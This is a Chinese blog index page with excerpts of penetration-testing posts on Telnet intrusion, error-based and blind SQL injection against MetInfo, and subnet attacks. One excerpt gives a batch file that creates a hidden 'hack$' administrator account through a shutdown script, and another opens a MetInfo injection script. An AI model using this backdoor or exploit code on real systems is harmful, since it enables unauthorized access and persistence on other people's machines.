详解Telnet入侵原理及利用方法(精华) 陌安-----专注追梦: 1、什么是Telnet?  对于Telnet的认识,不同的人持有不同的观点,可以把Telnet当成一种通信协议,但是对于入侵者而言,Telnet只是一种远程登录的工具。一旦入侵者与远程主机建立了Telnet连接,入侵者便可以使用目标主机上的软、硬件资源,而入侵者的本地机只相当于一个只有键盘和显示器的终端而已。2、Telnet被入侵者用来做什么  (1)Telnet是控制主机的第一手段  如果入侵者想要在远程主机上执行命令,需要建立IPC$连接,然后使用net time命令查看系统时间,最后使用at命令建立计划任务才能完成远程执行命令。虽然这种方法能够远程执行命...   2018年4月11日 8  
Winows后门及代码总汇(提权及服务器维护必学) 陌安 ' Blog: 组策略欺骗后门 创建一个批处理文件add.bat,内容是: @echo off net user hack$ test168 /add net localgroup administrators hack$ /add exit (2)利用   上传运行gpedit.msc,定位到“计算机配置一Windows设置一脚本(启动/关机)”, 双击右边窗口的“关机”,在其中添加add.bat。   这样就实现了当系统关机时创建hack$用户,...   2017年9月7日 4  
MetInfo5.2.X-5.3.X盲注脚本(二分法) ☯KK | I AM KK: #coding=utf-8 __author__ = '小亭KK---http://molok.lofter.com' import requests headers = { 'User-Agent': 'Mozilla/5.0 Chrome/28.0.1500.63' } keyword = '2013-12-26'#设置判断返回结果差异的关键字,可根据实际情况修改 datalength ...   2016年6月28日 4  
wooyun乌云爬虫及搜索系统架设教程 M0L0K's Blog—关注网络安全与渗透测试~: wooyun爬虫及搜索 wooyun.org bug search 1.相关组件 Python (建议2.7) pipmongodbscrapyFlaskpymongo 1、安新环境,安装比较麻烦,需要一定的Linux基础,大概安装过程 安装Scrapy http://www.hx99.net/OS/Linux/201601/37095.html 安装MongoDB 2.6 http://blog.csdn.net/chszs/article/...   2016年2月10日 10  
基于错误回显的SQL注入笔记 M0L0K's Blog—关注网络安全与渗透测试~: 0x00 关于错误回显     用我自己的话来讲,基于错误回显的sql注入就是通过sql语句的矛盾性来使数据被回显到页面上(当然在实际应用中得能回显在页面上,一般的网站都回避免这种情况,哈哈,要是能碰上你就偷着乐吧)。 0x01 用于错误回显的sql语句(下面的函数撸主只在mysql下试过也能成功,其他数据库有待考证,待有实例的时候会补充) 第一种: 基于 rand() 与 group by 的错误     首先看一下关于rand...   2016年1月23日 4  
C段渗透攻击必看的技术知识 ╰ァBy﹎冰客: 假设想攻击的主机IP是:61.139.1.79 同一子网下我们已有权限的主机IP是:61.139.1.88并可以3389登陆 第一步: tracert 61.139.1.1 C:\WIN2000\system32tracert 61.139.1.1 Tracing route to HACK-4FJ7EARC [61.139.1.1] over a maximum of 30 hops:...   2016年1月23日 10  
Woobuntu——开源中文白帽桌面系统 M0L0K's Blog——关注网络安全与渗透测试~: Wooyun + Ubuntu = Woobuntu Woobuntu是基于Ubuntu系统的一款安全研究环境配置工具,可以自动安装并配置众多的安全工具与依赖环境,此外还针对中国用户的习惯进行了一些优化,可以为白帽子们提供更加优雅的桌面系统体验。Woobuntu完全开源免费,并且保留了Ubuntu的全部特性。0x00 从kali说起 对于绝大多数白帽子而言,目前最好的渗透测试Linux系统是kali linux(之前的Backtrack Linux),我也一直在用Kali来进行各种工作。但是作为一个中国人,不得...   2015年12月12日 4  
 

© 千秋雪 | Powered by LOFTER